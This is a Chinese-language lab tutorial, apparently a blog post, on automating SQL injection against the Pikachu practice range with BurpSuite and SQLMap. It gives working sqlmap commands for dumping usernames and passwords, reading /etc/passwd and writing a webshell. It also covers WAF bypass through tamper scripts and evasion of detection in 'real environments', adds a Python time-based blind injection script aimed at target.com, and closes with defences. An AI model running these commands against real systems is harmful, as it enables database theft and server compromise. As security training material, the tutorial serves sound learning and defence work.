从Pikachu靶场实战出发：用BurpSuite+SQLMap自动化搞定SQL注入（保姆级流程）

从Pikachu靶场实战出发：用BurpSuite+SQLMap自动化搞定SQL注入（保姆级流程）

在网络安全领域，SQL注入始终是最常见且危害性极大的漏洞之一。对于刚入门的安全爱好者来说，手动测试SQL注入虽然能加深理解，但效率低下且容易遗漏关键点。本文将带你使用BurpSuite和SQLMap这对黄金组合，在Pikachu靶场中实现从漏洞发现到数据提取的全自动化流程。

1. 环境准备与工具配置

工欲善其事，必先利其器。在开始实战前，我们需要确保所有工具都正确配置并协同工作。

1.1 搭建Pikachu靶场环境

Pikachu是一个专为Web安全学习设计的漏洞演练平台，内置了多种类型的SQL注入场景：

# 下载Pikachu靶场 git clone https://github.com/zhuifengshaonianhanlu/pikachu # 启动Web服务（假设使用PHP内置服务器） cd pikachu && php -S 127.0.0.1:8080

提示：确保你的系统已安装PHP和MySQL，Pikachu的数据库初始化脚本通常位于/pikachu/pikachu.sql

1.2 BurpSuite基础配置

BurpSuite作为中间人代理，能拦截和修改所有HTTP请求：

1. 代理设置：

   • 打开BurpSuite → Proxy → Options
   • 确认监听端口（默认8080）与浏览器代理设置一致

2. CA证书安装：

   • 访问http://burp下载证书
   • 导入到浏览器的证书管理器

# 示例：Python requests库使用Burp代理 import requests proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} requests.get('http://target.com', proxies=proxies, verify=False)

1.3 SQLMap环境检查

SQLMap作为自动化SQL注入神器，需要Python环境支持：

# 检查SQLMap版本 sqlmap --version # 更新到最新版 git pull origin master

2. 自动化漏洞探测流程

传统手动测试需要逐个尝试payload，而自动化工具能系统性地发现各类注入点。

2.1 使用BurpSuite捕获请求

以Pikachu的"数字型注入(POST)"为例：

1. 浏览器访问http://localhost:8080/vul/sqli/sqli_id.php
2. 在BurpSuite中开启拦截(Intercept is on)
3. 提交任意数字（如1）并捕获请求
4. 右键选择"Save item"将请求保存为post.txt

注意：GET请求可直接复制URL，POST请求必须保存完整请求报文

2.2 SQLMap基础扫描

针对保存的请求文件运行SQLMap：

sqlmap -r post.txt --batch --risk=3 --level=5

关键参数解析：

2.3 结果解读与验证

SQLMap的输出包含多个关键信息段：

[14:32:45] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind' [14:32:47] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable [14:32:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [14:32:47] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found [14:32:47] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns [14:32:47] [INFO] target URL appears to have 2 columns in query

当看到parameter 'X' is vulnerable的提示时，说明已确认注入点。

3. 高级数据提取技巧

确认注入点后，我们可以提取数据库中的敏感信息。

3.1 获取数据库结构

sqlmap -r post.txt --dbs --tables --columns

这条命令将依次获取：

1. 所有数据库名称（--dbs）
2. 指定数据库的表（--tables）
3. 指定表的列（--columns）

3.2 定向数据导出

假设我们需要导出pikachu数据库的users表：

sqlmap -r post.txt -D pikachu -T users --dump

对于大型表，可以分批次导出：

# 先获取列信息 sqlmap -r post.txt -D pikachu -T users --columns # 选择特定列导出 sqlmap -r post.txt -D pikachu -T users -C username,password --dump

3.3 文件系统操作

在权限足够的情况下，还能进行文件读写：

# 读取服务器文件 sqlmap -r post.txt --file-read="/etc/passwd" # 写入Webshell（需有写权限） sqlmap -r post.txt --file-write="shell.php" --file-dest="/var/www/html/shell.php"

4. 实战技巧与避坑指南

自动化工具虽强大，但实际应用中会遇到各种问题。

4.1 常见问题解决方案

问题1：WAF拦截

# 使用随机User-Agent和延迟 sqlmap -r post.txt --random-agent --delay=1 # 启用混淆脚本 sqlmap -r post.txt --tamper=space2comment

问题2：Session依赖

# 指定Cookie sqlmap -r post.txt --cookie="PHPSESSID=1234"

问题3：CSRF防护

# 自动处理CSRF token sqlmap -r post.txt --csrf-token="token_name"

4.2 性能优化技巧

对于大型目标，这些参数能显著提升效率：

# 多线程扫描（谨慎使用） sqlmap -r post.txt --threads=5 # 只检查最可能成功的注入类型 sqlmap -r post.txt --technique=BEU

技术选择对照表：

4.3 防御规避策略

在真实环境中，过于激进的扫描可能触发警报：

# 限制扫描深度 sqlmap -r post.txt --level=2 --risk=2 # 设置最大请求数 sqlmap -r post.txt --max-requests=100 # 使用代理池 sqlmap -r post.txt --proxy="http://proxy.txt"

5. 自动化与手动测试结合

虽然自动化工具高效，但理解底层原理同样重要。

5.1 分析SQLMap的payload

开启verbose模式查看具体注入过程：

sqlmap -r post.txt -v 6

典型payload解析：

1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x717a707a71,(SELECT (ELT(2836=2836,1))),0x71786a6b71,0x78))s), 8446744073709551610, 8446744073709551610)))-- LbIU

这段payload实际上是在测试：

1. 使用ELT函数验证条件2836=2836是否成立
2. 通过乘法运算制造时间延迟或错误

5.2 关键手工测试点

即使使用自动化工具，这些手动测试仍不可替代：

1. 边界测试：

   • 测试空输入、超长字符串、特殊字符
   • 尝试不同编码方式（如URL编码、Unicode编码）

2. 业务逻辑验证：

   • 检查注入是否影响业务流程
   • 验证二次注入可能性

3. ORM框架测试：

   • 尝试绕过Hibernate、MyBatis等ORM框架的防护

# 示例：使用Python测试时间盲注 import requests import time url = "http://target.com/vuln" params = {"id": "1' AND IF(ASCII(SUBSTR(DATABASE(),1,1))=112,SLEEP(5),0)-- "} start = time.time() requests.get(url, params=params) elapsed = time.time() - start if elapsed > 4: print("Vulnerable to time-based SQLi")

6. 防御措施与最佳实践

了解攻击手段后，更要知道如何防护。

6.1 开发层面的防护

参数化查询示例：

// Java PreparedStatement示例 String query = "SELECT * FROM users WHERE id = ?"; PreparedStatement stmt = connection.prepareStatement(query); stmt.setInt(1, userId);

输入验证正则表达式：

# 只允许数字ID ^\d+$

6.2 运维层面的加固

安全配置清单：

1. 数据库账户使用最小权限原则
2. 定期更新数据库补丁
3. 配置适当的数据库审计日志
4. 使用WAF规则过滤常见注入模式

# MySQL安全配置示例 [mysqld] secure-file-priv = /null local-infile = 0 skip-show-database

6.3 持续监控方案

建议部署的安全监控工具：

• SQL注入检测：OSSEC、ModSecurity
• 异常行为分析：Elastic SIEM、Splunk
• 数据库审计：MySQL Enterprise Audit、pgAudit

在实际项目中，我们发现很多SQL注入漏洞源于过时的第三方组件。定期使用依赖检查工具（如OWASP Dependency-Check）能有效降低风险。